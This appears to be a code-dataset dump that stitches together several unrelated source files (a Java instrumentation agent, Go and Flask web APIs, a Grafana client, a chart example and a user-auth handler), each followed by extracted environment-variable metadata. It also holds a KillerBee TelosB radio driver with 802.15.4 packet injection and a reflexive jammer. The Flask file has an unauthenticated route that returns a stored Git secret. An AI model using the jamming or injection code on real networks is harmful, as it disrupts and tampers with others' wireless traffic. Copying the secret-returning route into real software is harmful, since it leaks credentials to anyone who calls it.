} catch (UnsupportedClassVersionError exception) {
// ignore
}
}
private static void setBootstrapPackages(Config config) {
BootstrapPackagesBuilderImpl builder = new BootstrapPackagesBuilderImpl();
for (BootstrapPackagesConfigurer configurer : load(BootstrapPackagesConfigurer.class)) {
configurer.configure(config, builder);
}
BootstrapPackagePrefixesHolder.setBoostrapPackagePrefixes(builder.build());
}
private static void runBeforeAgentListeners(
Iterable<AgentListener> agentListeners, Config config) {
for (AgentListener agentListener : agentListeners) {
agentListener.beforeAgent(config);
}
}
private static AgentBuilder configureIgnoredTypes(Config config, AgentBuilder agentBuilder) {
IgnoredTypesBuilderImpl builder = new IgnoredTypesBuilderImpl();
for (IgnoredTypesConfigurer configurer : loadOrdered(IgnoredTypesConfigurer.class)) {
configurer.configure(config, builder);
}
Trie<Boolean> ignoredTasksTrie = builder.buildIgnoredTasksTrie();
InstrumentedTaskClasses.setIgnoredTaskClassesPredicate(ignoredTasksTrie::contains);
return agentBuilder
.ignore(any(), new IgnoredClassLoadersMatcher(builder.buildIgnoredClassLoadersTrie()))
.or(new IgnoredTypesMatcher(builder.buildIgnoredTypesTrie()));
}
private static void runAfterAgentListeners(
Iterable<AgentListener> agentListeners, Config config) {
// java.util.logging.LogManager maintains a final static LogManager, which is created during
// class initialization. Some AgentListener implementations may use JRE bootstrap classes
// which touch this class (e.g. JFR classes or some MBeans).
// It is worth noting that starting from Java 9 (JEP 264) Java platform classes no longer use
// JUL directly, but instead they use a new System.Logger interface, so the LogManager issue
// applies mainly to Java 8.
// This means applications which require a custom LogManager may not have a chance to set the
// global LogManager if one of those AgentListeners runs first: it will incorrectly
// set the global LogManager to the default JVM one in cases where the instrumented application
// sets the LogManager system property or when the custom LogManager class is not on the system
// classpath.
// Our solution is to delay the initialization of AgentListeners when we detect a custom
// log manager being used.
// Once we see the LogManager class loading, it's safe to run AgentListener#afterAgent() because
// the application is already setting the global LogManager and AgentListener won't be able
// to touch it due to classloader locking.
boolean shouldForceSynchronousAgentListenersCalls =
Config.get().getBoolean(FORCE_SYNCHRONOUS_AGENT_LISTENERS_CONFIG, false);
if (!shouldForceSynchronousAgentListenersCalls
&& isJavaBefore9()
&& isAppUsingCustomLogManager()) {
logger.debug("Custom JUL LogManager detected: delaying AgentListener#afterAgent() calls");
registerClassLoadCallback(
"java.util.logging.LogManager", new DelayedAfterAgentCallback(config, agentListeners));
} else {
for (AgentListener agentListener : agentListeners) {
agentListener.afterAgent(config);
}
}
}
private static void addByteBuddyRawSetting() {
String savedPropertyValue = System.getProperty(TypeDefinition.RAW_TYPES_PROPERTY);
try {
System.setProperty(TypeDefinition.RAW_TYPES_PROPERTY, "true");
boolean rawTypes = TypeDescription.AbstractBase.RAW_TYPES;
if (!rawTypes) {
logger.debug("Too late to enable {}", TypeDefinition.RAW_TYPES_PROPERTY);
}
} finally {
if (savedPropertyValue == null) {
System.clearProperty(TypeDefinition.RAW_TYPES_PROPERTY);
} else {
System.setProperty(TypeDefinition.RAW_TYPES_PROPERTY, savedPropertyValue);
}
}
}
static class RedefinitionLoggingListener implements AgentBuilder.RedefinitionStrategy.Listener {
private static final Logger logger = LoggerFactory.getLogger(RedefinitionLoggingListener.class);
@Override
public void onBatch(int index, List<Class<?>> batch, List<Class<?>> types) {}
@Override
public Iterable<? extends List<Class<?>>> onError(
int index, List<Class<?>> batch, Throwable throwable, List<Class<?>> types) {
if (logger.isDebugEnabled()) {
logger.debug(
"Exception while retransforming {} classes: {}", batch.size(), batch, throwable);
}
return Collections.emptyList();
}
@Override
public void onComplete(
int amount, List<Class<?>> types, Map<List<Class<?>>, Throwable> failures) {}
}
static class TransformLoggingListener extends AgentBuilder.Listener.Adapter {
private static final TransformSafeLogger logger =
TransformSafeLogger.getLogger(TransformLoggingListener.class);
@Override
public void onError(
String typeName,
ClassLoader classLoader,
JavaModule module,
boolean loaded,
Throwable throwable) {
if (logger.isDebugEnabled()) {
logger.debug(
"Failed to handle {} for transformation on classloader {}",
typeName,
classLoader,
throwable);
}
}
@Override
public void onTransformation(
TypeDescription typeDescription,
ClassLoader classLoader,
JavaModule module,
boolean loaded,
DynamicType dynamicType) {
logger.debug("Transformed {} -- {}", typeDescription.getName(), classLoader);
}
}
/**
* Register a callback to run when a class is loading.
*
* <p>Caveats:
*
* <ul>
* <li>This callback will be invoked by a jvm class transformer.
* <li>Classes filtered out by {@link AgentInstaller}'s skip list will not be matched.
* </ul>
*
* @param className name of the class to match against
* @param callback runnable to invoke when class name matches
*/
public static void registerClassLoadCallback(String className, Runnable callback) {
synchronized (CLASS_LOAD_CALLBACKS) {
List<Runnable> callbacks =
CLASS_LOAD_CALLBACKS.computeIfAbsent(className, k -> new ArrayList<>());
callbacks.add(callback);
}
}
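// Illustrative example only; runDelayedInitialization() is a hypothetical callback:
//   AgentInstaller.registerClassLoadCallback(
//       "java.util.logging.LogManager", () -> runDelayedInitialization());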
private static class DelayedAfterAgentCallback implements Runnable {
private final Iterable<AgentListener> agentListeners;
private final Config config;
private DelayedAfterAgentCallback(Config config, Iterable<AgentListener> agentListeners) {
this.agentListeners = agentListeners;
this.config = config;
}
@Override
public void run() {
/*
* This callback is called from within bytecode transformer. This can be a problem if callback tries
* to load classes being transformed. To avoid this we start a thread here that calls the callback.
* This seems to resolve this problem.
*/
Thread thread = new Thread(this::runAgentListeners);
thread.setName("delayed-agent-listeners");
thread.setDaemon(true);
thread.start();
}
private void runAgentListeners() {
for (AgentListener agentListener : agentListeners) {
try {
agentListener.afterAgent(config);
} catch (RuntimeException e) {
logger.error("Failed to execute {}", agentListener.getClass().getName(), e);
}
}
}
}
private static class ClassLoadListener extends AgentBuilder.Listener.Adapter {
@Override
public void onComplete(
String typeName, ClassLoader classLoader, JavaModule javaModule, boolean b) {
synchronized (CLASS_LOAD_CALLBACKS) {
List<Runnable> callbacks = CLASS_LOAD_CALLBACKS.get(typeName);
if (callbacks != null) {
for (Runnable callback : callbacks) {
callback.run();
}
}
}
}
}
private static class RedefinitionDiscoveryStrategy
implements AgentBuilder.RedefinitionStrategy.DiscoveryStrategy {
private static final AgentBuilder.RedefinitionStrategy.DiscoveryStrategy delegate =
AgentBuilder.RedefinitionStrategy.DiscoveryStrategy.Reiterating.INSTANCE;
@Override
public Iterable<Iterable<Class<?>>> resolve(Instrumentation instrumentation) {
// filter out our agent classes and injected helper classes
return () ->
streamOf(delegate.resolve(instrumentation))
.map(RedefinitionDiscoveryStrategy::filterClasses)
.iterator();
}
private static Iterable<Class<?>> filterClasses(Iterable<Class<?>> classes) {
return () -> streamOf(classes).filter(c -> !isIgnored(c)).iterator();
}
private static <T> Stream<T> streamOf(Iterable<T> iterable) {
return StreamSupport.stream(iterable.spliterator(), false);
}
private static boolean isIgnored(Class<?> c) {
ClassLoader cl = c.getClassLoader();
if (cl instanceof AgentClassLoader || cl instanceof ExtensionClassLoader) {
return true;
}
// ignore generated byte buddy helper classes
if (c.getName().startsWith("java.lang.ClassLoader$ByteBuddyAccessor$")) {
return true;
}
return HelperInjector.isInjectedClass(c);
}
}
/** Detect if the instrumented application is using a custom JUL LogManager. */
private static boolean isAppUsingCustomLogManager() {
String jbossHome = System.getenv("JBOSS_HOME");
if (jbossHome != null) {
logger.debug("Found JBoss: {}; assuming app is using custom LogManager", jbossHome);
// JBoss/Wildfly is known to set a custom log manager after startup.
// Originally we were checking for the presence of a jboss class,
// but it seems some non-jboss applications have jboss classes on the classpath.
// This would cause AgentListener#afterAgent() calls to be delayed indefinitely.
// Checking for an environment variable required by jboss instead.
return true;
}
String customLogManager = System.getProperty("java.util.logging.manager");
if (customLogManager != null) {
logger.debug(
"Detected custom LogManager configuration: java.util.logging.manager={}",
customLogManager);
boolean onSysClasspath =
ClassLoader.getSystemResource(getResourceName(customLogManager)) != null;
logger.debug(
"Class {} is on system classpath: {}delaying AgentInstaller#afterAgent()",
customLogManager,
onSysClasspath ? "not " : "");
// Some applications set java.util.logging.manager but never actually initialize the logger.
// Check to see if the configured manager is on the system classpath.
// If so, it should be safe to initialize AgentInstaller which will setup the log manager:
// LogManager tries to load the implementation first using system CL, then falls back to
// current context CL
return !onSysClasspath;
}
return false;
}
private static void logVersionInfo() {
VersionLogger.logAllVersions();
logger.debug(
"{} loaded on {}", AgentInstaller.class.getName(), AgentInstaller.class.getClassLoader());
}
private AgentInstaller() {}
private static class StrictContextStressor implements ContextStorage, AutoCloseable {
private final ContextStorage contextStorage;
private final int sleepMillis;
private StrictContextStressor(ContextStorage contextStorage, int sleepMillis) {
this.contextStorage = contextStorage;
this.sleepMillis = sleepMillis;
}
@Override
public Scope attach(Context toAttach) {
return wrap(contextStorage.attach(toAttach));
}
@Nullable
@Override
public Context current() {
return contextStorage.current();
}
@Override
public void close() throws Exception {
if (contextStorage instanceof AutoCloseable) {
((AutoCloseable) contextStorage).close();
}
}
private Scope wrap(Scope scope) {
return () -> {
try {
Thread.sleep(sleepMillis);
} catch (InterruptedException e) {
Thread.currentThread().interrupt();
}
scope.close();
};
}
}
}
|
[
"\"JBOSS_HOME\""
] |
[] |
[
"JBOSS_HOME"
] |
[]
|
["JBOSS_HOME"]
|
java
| 1 | 0 | |
main.go
|
package main
import (
"context"
"encoding/json"
"flag"
"fmt"
"io/ioutil"
"log"
"net/http"
"github.com/gin-gonic/gin"
"os"
"strconv"
"strings"
"github.com/aws/aws-sdk-go/aws/ec2metadata"
"github.com/aws/aws-sdk-go/aws/session"
"github.com/aws/aws-xray-sdk-go/xray"
_ "github.com/aws/aws-xray-sdk-go/plugins/ecs"
)
func init() {
xray.Configure(xray.Config{
DaemonAddr: "127.0.0.1:2000",
ServiceVersion: "1.2.3",
})
}
func main() {
flag.Parse()
if flag.Arg(0) == "hc" {
fmt.Println("ok")
} else {
fmt.Println("=== Application API Starting!!")
router := gin.Default()
router.Use(func(ctx *gin.Context) {
TraceSeg(ctx, ctx.Request.URL.Path) // we want to pass the context returned here on to the next handler…
ctx.Next()
})
router.GET("/", notFoundHandler)
router.GET("/hc", healthHandler)
router.GET("/info", infoHandler)
router.GET("/fibo", fiboHandler)
router.GET("/zipcode", zipcodeHandler)
router.GET("/down", downHandler)
router.Run(":8080")
}
}
func TraceSeg(c context.Context, service string) (*context.Context) {
ctx, seg := xray.BeginSegment(c, service)
fmt.Println(service)
seg.Close(nil)
return &ctx
}
func TraceSubSeg(c context.Context, service string) (*context.Context) {
ctx, subSeg := xray.BeginSubsegment(c, service)
fmt.Println(service)
subSeg.Close(nil)
return &ctx
}
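// NOTE (illustrative sketch, not wired up here): to make a segment context
// visible to later gin handlers, the middleware above could swap it into the
// request before calling ctx.Next(), e.g.:
//   ctx.Request = ctx.Request.WithContext(segCtx)
// where segCtx is the context returned by xray.BeginSegment.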
func notFoundHandler(ctx *gin.Context) {
fmt.Println("--- notFoundHandler")
ctx.String(404, "404 Not Found!!")
}
func healthHandler(ctx *gin.Context) {
fmt.Println("--- healthHandler")
ctx.String(200, "OK")
}
func infoHandler(ctx *gin.Context) {
fmt.Println("--- infoHandler")
// Get the instance ID
sess := session.Must(session.NewSession())
svc := ec2metadata.New(sess)
doc, _ := svc.GetInstanceIdentityDocument()
instanceId := doc.InstanceID
// Get the container ID
containerId, _ := os.Hostname()
// Get the task
resp, err := http.Get(os.Getenv("ECS_CONTAINER_METADATA_URI"))
if err != nil {
ctx.String(500, "ERROR")
return
}
defer resp.Body.Close()
body, err := ioutil.ReadAll(resp.Body)
if err != nil {
ctx.String(500, "ERROR")
return
}
var metadata interface{}
err = json.Unmarshal(body, &metadata)
if err != nil {
ctx.String(500, "ERROR")
return
}
taskArn := metadata.(map[string]interface{})["Labels"].(map[string]interface{})["com.amazonaws.ecs.task-arn"].(string)
task := strings.Split(taskArn, "/")[1]
// Response
ctx.String(200, "instanceId: "+instanceId+"\ntask: "+task+"\ncontainerId: "+containerId)
}
func fiboHandler(ctx *gin.Context) {
fmt.Println("--- fiboHandler")
n, err := strconv.Atoi(ctx.Query("n"))
if err != nil {
ctx.String(500, "ERROR")
return
}
ctx.String(200, "Fibonacci number "+strconv.Itoa(n)+" is "+strconv.Itoa(fibo(n)))
}
func zipcodeHandler(ctx *gin.Context) {
fmt.Println("--- zipcodeHandler")
newCtx := ctx.Request.Context()
zipcode, err := strconv.Atoi(ctx.Query("zipcode"))
if err != nil {
ctx.String(500, "ERROR")
return
}
myClient := xray.Client(http.DefaultClient)
req, err := http.NewRequest(http.MethodGet, "http://zipcloud.ibsnet.co.jp/api/search?zipcode=" + strconv.Itoa(zipcode), nil)
if err != nil {
fmt.Errorf("[BUG] failed to build request: %s", err)
return
}
// c := (*((*ctx).Request)).Context()
// fmt.Println(c)
resp, err := myClient.Do(req.WithContext(newCtx)) // newCtx is a context.Context value, not a pointer
ctx.String(200, "http://zipcloud.ibsnet.co.jp/api/search?zipcode=" + strconv.Itoa(zipcode))
if err != nil {
ctx.String(500, "ERROR")
return
}
defer resp.Body.Close()
b, err := ioutil.ReadAll(resp.Body)
if err == nil {
ctx.String(200, string(b))
}
}
func downHandler(ctx *gin.Context) {
fmt.Println("--- downHandler")
ctx.String(500, "DOWN!!!")
log.Fatal("DOWN!!!")
}
func fibo(n int) int {
if n < 2 {
return 1
}
return fibo(n-2) + fibo(n-1)
}
|
[
"\"ECS_CONTAINER_METADATA_URI\""
] |
[] |
[
"ECS_CONTAINER_METADATA_URI"
] |
[]
|
["ECS_CONTAINER_METADATA_URI"]
|
go
| 1 | 0 | |
forum_app/api/website.py
|
#
################################################################################
# Modules and functions import statements
################################################################################
import json
import logging
import hmac
import hashlib
from datetime import datetime
from time import time
from flask import request, make_response, abort
from forum_app import app, secrets
import git
import os
@app.route('/api/website/env', methods=['GET', 'POST'])
def api_website_env():
logging.info("In api_website_env()")
# sec1 = os.getenv('BASH_SECRET')
# sec2 = os.getenv('OTHER_SECRET')
# app_secrets_file = open('/home/zhixian/.app-secrets.json')
# app_secrets = json.load(app_secrets_file)
# return str(app_secrets)
return secrets['GIT_SECRET']
# return str(os.environ)
#return str(sec1) + ' -- ' + str(sec2)
@app.route('/api/website/datetime', methods=['GET', 'POST'])
def api_datetime():
logging.info("In api_datetime()")
# root_logger = logging.getLogger()
try:
# logging.info(len(root_logger.handlers))
# logging.info((str(root_logger.handlers[0])))
# logging.info((str(root_logger.handlers[1])))
# for h in root_logger.handlers:
# logging.info(str(h))
# # logging.info(str(h.level))
# # logging.info(str(h.name))
# logging_format = logging.Formatter('%(asctime)-15s %(levelname)-8s %(funcName)-20s %(message)s')
# default_console_logger = root_logger.handlers[0]
# default_console_logger.setFormatter(logging_format)
# logging.info("OK SZET")
# x = root_logger.handlers[0]
# logging.info(x.name)
# logging.info(x.level)
# logging.info(str(type(x)))
# x.setFormatter(logging_format)
# y = root_logger.handlers[1]
# logging.info(y.name)
# logging.info(y.level)
# logging.info(str(type(y)))
# y.setFormatter(logging_format)
logging.info('asdzxc')
#logging.info(str(dir(logging.getLogger().handlers[0])))
# logging.info(str(logging.getLogger().handlers[0]))
# logging.info(str(logging.getLogger().handlers[1]))
# logging.info(root_logger.handlers[0].name)
# logging.info(root_logger.handlers[1].name)
# logging.info(root_logger.handlers[0].level)
# logging.info(root_logger.handlers[1].level)
except Exception as e:
logging.info("ERROR----------ERROR----------")
logging.error(e)
logging.info("In api_datetime() END")
return str(datetime.utcnow())
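# For reference: GitHub's X-Hub-Signature header has the form
# "<algorithm>=<hexdigest>", where the digest is an HMAC of the raw request
# body keyed with the configured webhook secret. The handler below recomputes
# that digest with hmac.new() and compares it using hmac.compare_digest().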
@app.route('/api/website/change-notification', methods=['POST'])
def api_website_change_notification():
logging.info("In api_website_change_notification()")
is_post = request.method == 'POST'
has_x_hub_signature = "X-Hub-Signature" in request.headers
has_git_webhook_secret = 'GIT_WEBHOOK_SECRET' in secrets
if is_post and has_x_hub_signature and has_git_webhook_secret:
signature = request.headers["X-Hub-Signature"]
encoded_git_webhook_secret = secrets['GIT_WEBHOOK_SECRET'].encode("utf8")
hash_algorithm, hash_value = signature.split("=")
logging.info(f"github_hash_key:{hash_algorithm}, github_hash:{hash_value}")
mac = hmac.new(encoded_git_webhook_secret, msg=request.data, digestmod=hash_algorithm)
is_matching_hash = hmac.compare_digest(mac.hexdigest(), hash_value)
logging.info(f"Github hash match: {is_matching_hash}")
if is_matching_hash:
repo = git.Repo('/home/zhixian/website')
origin = repo.remotes.origin
origin.pull()
logging.info("Local Github repository pulled.")
return 'OK', 200
else:
error_message = f"Invalid api_website_change_notification() call; is_post:{is_post}, has_x_hub_signature: {has_x_hub_signature} has_git_webhook_secret: {has_git_webhook_secret}"
logging.info(error_message)
return error_message, 400
|
[] |
[] |
[
"BASH_SECRET",
"OTHER_SECRET"
] |
[]
|
["BASH_SECRET", "OTHER_SECRET"]
|
python
| 2 | 0 | |
killerbee/dev_telosb.py
|
'''
Support for the TelosB / Tmote Sky platforms, and close clones.
Utilizes the GoodFET firmware with CCSPI application, and the GoodFET client code.
'''
import os
import time
import struct
import time
from datetime import datetime, timedelta
from kbutils import KBCapabilities, makeFCS
from GoodFETCCSPI import GoodFETCCSPI
CC2420_REG_SYNC = 0x14
class TELOSB:
def __init__(self, dev):
'''
Instantiates the KillerBee class for our TelosB/TmoteSky running GoodFET firmware.
@type dev: String
@param dev: Serial device identifier (ex /dev/ttyUSB0)
@return: None
@rtype: None
'''
self._channel = None
self._page = 0
self.handle = None
self.dev = dev
os.environ["board"] = "telosb" #set enviroment variable for GoodFET code to use
self.handle = GoodFETCCSPI()
self.handle.serInit(port=self.dev)
self.handle.setup()
self.__stream_open = False
self.capabilities = KBCapabilities()
self.__set_capabilities()
def close(self):
self.handle.serClose()
self.handle = None
def check_capability(self, capab):
return self.capabilities.check(capab)
def get_capabilities(self):
return self.capabilities.getlist()
def __set_capabilities(self):
'''
Sets the capability information appropriate for GoodFETCCSPI client and firmware.
@rtype: None
@return: None
'''
self.capabilities.setcapab(KBCapabilities.FREQ_2400, True)
self.capabilities.setcapab(KBCapabilities.SNIFF, True)
self.capabilities.setcapab(KBCapabilities.SETCHAN, True)
self.capabilities.setcapab(KBCapabilities.INJECT, True)
self.capabilities.setcapab(KBCapabilities.PHYJAM_REFLEX, True)
self.capabilities.setcapab(KBCapabilities.SET_SYNC, True)
return
# KillerBee expects the driver to implement this function
#def get_dev_info(self, dev, bus):
def get_dev_info(self):
'''
Returns device information in a list identifying the device.
@rtype: List
@return: List of 3 strings identifying device.
'''
return [self.dev, "TelosB/Tmote", ""]
# KillerBee expects the driver to implement this function
def sniffer_on(self, channel=None, page=0):
'''
Turns the sniffer on such that pnext() will start returning observed
data. Will set the command mode to Air Capture if it is not already
set.
@type channel: Integer
@param channel: Sets the channel, optional
@type page: Integer
@param page: Sets the subghz page, not supported on this device
@rtype: None
'''
self.capabilities.require(KBCapabilities.SNIFF)
self.handle.RF_promiscuity(1);
self.handle.RF_autocrc(0);
if channel != None:
self.set_channel(channel, page)
self.handle.CC_RFST_RX();
#print "Sniffer started (listening as %010x on %i MHz)" % (self.handle.RF_getsmac(), self.handle.RF_getfreq()/10**6);
self.__stream_open = True
# KillerBee expects the driver to implement this function
def sniffer_off(self):
'''
Turns the sniffer off, freeing the hardware for other functions. It is
not necessary to call this function before closing the interface with
close().
@rtype: None
'''
#TODO actually have firmware stop sending us packets!
self.__stream_open = False
# KillerBee expects the driver to implement this function
def set_channel(self, channel, page=0):
'''
Sets the radio interface to the specified channel (limited to 2.4 GHz channels 11-26)
@type channel: Integer
@param channel: Sets the channel, optional
@type page: Integer
@param page: Sets the subghz page, not supported on this device
@rtype: None
'''
self.capabilities.require(KBCapabilities.SETCHAN)
if channel >= 11 and channel <= 26:
self._channel = channel
self.handle.RF_setchan(channel)
else:
raise Exception('Invalid channel')
if page:
raise Exception('SubGHz not supported')
# KillerBee expects the driver to implement this function
def inject(self, packet, channel=None, count=1, delay=0, page=0):
'''
Injects the specified packet contents.
@type packet: String
@param packet: Packet contents to transmit, without FCS.
@type channel: Integer
@param channel: Sets the channel, optional
@type page: Integer
@param page: Sets the subghz page, not supported on this device
@type count: Integer
@param count: Transmits a specified number of frames, def=1
@type delay: Float
@param delay: Delay between each frame, def=0
@rtype: None
'''
self.capabilities.require(KBCapabilities.INJECT)
if len(packet) < 1:
raise Exception('Empty packet')
if len(packet) > 125: # 127 - 2 to accommodate FCS
raise Exception('Packet too long')
if channel != None:
self.set_channel(channel, page)
self.handle.RF_autocrc(1) #let radio add the CRC
for pnum in range(0, count):
gfready = [ord(x) for x in packet] #convert packet string to GoodFET expected integer format
gfready.insert(0, len(gfready)+2) #add a length that leaves room for CRC
self.handle.RF_txpacket(gfready)
# Sleep was for 1 second but testing by Gianfranco Costamagna suggested lowering to 1/100th of a second
time.sleep(0.01) #TODO get rid of completely, and just check CC2420 status
# https://github.com/alvarop/msp430-cc2500/blob/master/lib/cc2500/cc2500.c
# KillerBee expects the driver to implement this function
def pnext(self, timeout=100):
'''
Returns a dictionary containing packet data, else None.
@type timeout: Integer
@param timeout: Timeout to wait for packet reception in usec
@rtype: List
@return: Returns None if the timeout expires and no packet was received. When a packet is received, a dictionary is returned with the keys bytes (string of packet bytes), validcrc (boolean indicating a valid CRC), rssi (unscaled RSSI), and location (may be set to None). For backwards compatibility, keys for 0,1,2 are provided such that it can be treated as if a list is returned, in the form [ String: packet contents | Bool: Valid CRC | Int: Unscaled RSSI ]
'''
if self.__stream_open == False:
self.sniffer_on() #start sniffing
packet = None;
start = datetime.utcnow()
while (packet is None and (start + timedelta(microseconds=timeout) > datetime.utcnow())):
packet = self.handle.RF_rxpacket()
rssi = self.handle.RF_getrssi() #TODO calibrate
if packet is None:
return None
frame = packet[1:]
if frame[-2:] == makeFCS(frame[:-2]): validcrc = True
else: validcrc = False
#Return in a nicer dictionary format, so we don't have to reference by number indices.
#Note that 0,1,2 indices are inserted twice for backwards compatibility.
result = {0:frame, 1:validcrc, 2:rssi, 'bytes':frame, 'validcrc':validcrc, 'rssi':rssi, 'location':None}
result['dbm'] = rssi - 45 #TODO tune specifically to the Tmote platform (does ext antenna need to be different?)
result['datetime'] = datetime.utcnow()
return result
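# Illustrative capture loop (device path and channel are examples):
#     dev = TELOSB('/dev/ttyUSB0')
#     dev.sniffer_on(channel=11)
#     pkt = dev.pnext()
#     if pkt is not None and pkt['validcrc']:
#         print pkt['bytes'].encode('hex')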
def ping(self, da, panid, sa, channel=None, page=0):
'''
Not yet implemented.
@return: None
@rtype: None
'''
raise Exception('Not yet implemented')
def jammer_on(self, channel=None, page=0):
'''
Not yet implemented.
@type channel: Integer
@param channel: Sets the channel, optional
@type page: Integer
@param page: Sets the subghz page, not supported on this device
@rtype: None
'''
self.capabilities.require(KBCapabilities.PHYJAM_REFLEX)
self.handle.RF_promiscuity(1)
self.handle.RF_autocrc(0)
if channel != None:
self.set_channel(channel, page)
self.handle.CC_RFST_RX()
self.handle.RF_reflexjam()
def set_sync(self, sync=0xA70F):
'''Set the register controlling the 802.15.4 PHY sync byte.'''
self.capabilities.require(KBCapabilities.SET_SYNC)
if (sync >> 16) > 0:
raise Exception("Sync word (%x) must be 2-bytes or less." % sync)
return self.handle.poke(CC2420_REG_SYNC, sync)
def jammer_off(self, channel=None, page=0):
'''
Not yet implemented.
@return: None
@rtype: None
'''
#TODO implement
raise Exception('Not yet implemented')
|
[] |
[] |
[
"board"
] |
[]
|
["board"]
|
python
| 1 | 0 | |
client.go
|
package gapi
import (
"bytes"
"fmt"
"io"
"log"
"net/http"
"net/url"
"os"
"path"
"strings"
)
type Client struct {
key string
baseURL url.URL
*http.Client
}
// New creates a new Grafana client.
// auth can be in user:pass format, or it can be an API key.
func New(auth, baseURL string) (*Client, error) {
u, err := url.Parse(baseURL)
if err != nil {
return nil, err
}
key := ""
if strings.Contains(auth, ":") {
split := strings.Split(auth, ":")
u.User = url.UserPassword(split[0], split[1])
} else {
key = fmt.Sprintf("Bearer %s", auth)
}
return &Client{
key,
*u,
&http.Client{},
}, nil
}
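// Example from a consuming package (values are illustrative):
//   c, err := gapi.New("admin:admin", "http://localhost:3000") // basic auth
//   c, err := gapi.New("eyJrIjoi...", "http://localhost:3000") // API key sent as a Bearer token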
func (c *Client) newRequest(method, requestPath string, query url.Values, body io.Reader) (*http.Request, error) {
url := c.baseURL
url.Path = path.Join(url.Path, requestPath)
url.RawQuery = query.Encode()
req, err := http.NewRequest(method, url.String(), body)
if err != nil {
return req, err
}
if c.key != "" {
req.Header.Add("Authorization", c.key)
}
if os.Getenv("GF_LOG") != "" {
if body == nil {
log.Println("request to ", url.String(), "with no body data")
} else {
log.Println("request to ", url.String(), "with body data", body.(*bytes.Buffer).String())
}
}
req.Header.Add("Content-Type", "application/json")
return req, err
}
|
[
"\"GF_LOG\""
] |
[] |
[
"GF_LOG"
] |
[]
|
["GF_LOG"]
|
go
| 1 | 0 | |
_examples/bar_chart/main.go
|
package main
import (
"fmt"
"log"
"net/http"
"os"
"github.com/beevee/go-chart"
)
func drawChart(res http.ResponseWriter, req *http.Request) {
sbc := chart.BarChart{
Title: "Test Bar Chart",
TitleStyle: chart.StyleShow(),
Background: chart.Style{
Padding: chart.Box{
Top: 40,
},
},
Height: 512,
BarWidth: 60,
XAxis: chart.StyleShow(),
YAxis: chart.YAxis{
Style: chart.StyleShow(),
},
Bars: []chart.Value{
{Value: 5.25, Label: "Blue"},
{Value: 4.88, Label: "Green"},
{Value: 4.74, Label: "Gray"},
{Value: 3.22, Label: "Orange"},
{Value: 3, Label: "Test"},
{Value: 2.27, Label: "??"},
{Value: 1, Label: "!!"},
},
}
res.Header().Set("Content-Type", "image/png")
err := sbc.Render(chart.PNG, res)
if err != nil {
fmt.Printf("Error rendering chart: %v\n", err)
}
}
func port() string {
if len(os.Getenv("PORT")) > 0 {
return os.Getenv("PORT")
}
return "8080"
}
func main() {
listenPort := fmt.Sprintf(":%s", port())
fmt.Printf("Listening on %s\n", listenPort)
http.HandleFunc("/", drawChart)
log.Fatal(http.ListenAndServe(listenPort, nil))
}
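// Illustrative note (not part of the original example): the server listens on the
// PORT environment variable when set, falling back to 8080, so a sketch of running
// it on another port might be:
//
//	PORT=9090 go run main.go   # then open http://localhost:9090/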
|
[
"\"PORT\"",
"\"PORT\""
] |
[] |
[
"PORT"
] |
[]
|
["PORT"]
|
go
| 1 | 0 | |
api/handler/user.go
|
package handler
import (
"encoding/json"
"net/http"
"os"
"time"
"github.com/ATechnoHazard/hades-2/api/middleware"
"github.com/ATechnoHazard/hades-2/api/views"
u "github.com/ATechnoHazard/hades-2/internal/utils"
"github.com/ATechnoHazard/hades-2/pkg/entities"
"github.com/ATechnoHazard/hades-2/pkg/user"
"github.com/julienschmidt/httprouter"
)
func signUp(uSvc user.Service) http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
acc := &entities.User{}
if err := json.NewDecoder(r.Body).Decode(acc); err != nil {
views.Wrap(err, w)
return
}
acc.CreatedAt = time.Now()
tk, err := uSvc.CreateUser(acc)
if err != nil {
views.Wrap(err, w)
return
}
tkString, err := tk.SignedString([]byte(os.Getenv("TOKEN_PASSWORD")))
if err != nil {
views.Wrap(err, w)
return
}
msg := u.Message(http.StatusOK, "User account successfully saved")
msg["token"] = tkString
u.Respond(w, msg)
}
}
func login(uSvc user.Service) http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
acc := &entities.User{}
if err := json.NewDecoder(r.Body).Decode(acc); err != nil {
views.Wrap(err, w)
return
}
tk, err := uSvc.Login(acc.Email, acc.Password)
if err != nil {
views.Wrap(err, w)
return
}
tkString, err := tk.SignedString([]byte(os.Getenv("TOKEN_PASSWORD")))
if err != nil {
views.Wrap(err, w)
return
}
msg := u.Message(http.StatusOK, "Successfully logged in")
msg["token"] = tkString
u.Respond(w, msg)
}
}
func getUserOrgs(uSvc user.Service) http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
ctx := r.Context()
tk := ctx.Value(middleware.JwtContextKey("token")).(*middleware.Token)
orgs, err := uSvc.GetUserOrgs(tk.Email)
if err != nil {
views.Wrap(err, w)
return
}
msg := u.Message(http.StatusOK, "Successfully retrieved user organizations")
msg["organizations"] = orgs
u.Respond(w, msg)
}
}
func getAllUsers(uSvc user.Service) http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
ctx := r.Context()
tk := ctx.Value(middleware.JwtContextKey("token")).(*middleware.Token)
users, err := uSvc.GetOrgUsers(tk.OrgID)
if err != nil {
views.Wrap(err, w)
return
}
msg := u.Message(http.StatusOK, "Successfully retrieved organization users")
msg["users"] = users
u.Respond(w, msg)
return
}
}
func MakeUserHandler(r *httprouter.Router, uSvc user.Service) {
r.HandlerFunc("POST", "/api/v2/org/signup", signUp(uSvc))
r.HandlerFunc("POST", "/api/v2/org/login", login(uSvc))
r.HandlerFunc("GET", "/api/v2/org", middleware.JwtAuthentication(getUserOrgs(uSvc)))
r.HandlerFunc("GET", "/api/v2/org/users", middleware.JwtAuthentication(getAllUsers(uSvc)))
}
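// Illustrative sketch (not part of the original file): the handlers above sign JWTs
// with the TOKEN_PASSWORD environment variable. A hypothetical local run might look
// like the following; the binary name, port, and JSON field names are assumptions,
// not a documented contract.
//
//	TOKEN_PASSWORD=some-secret ./hades-server &
//	curl -X POST -d '{"email":"a@example.com","password":"hunter2"}' \
//	     http://localhost:8080/api/v2/org/signup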
|
[
"\"TOKEN_PASSWORD\"",
"\"TOKEN_PASSWORD\""
] |
[] |
[
"TOKEN_PASSWORD"
] |
[]
|
["TOKEN_PASSWORD"]
|
go
| 1 | 0 | |
image/manifest/manifest_test.go
|
/*
Copyright 2020 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
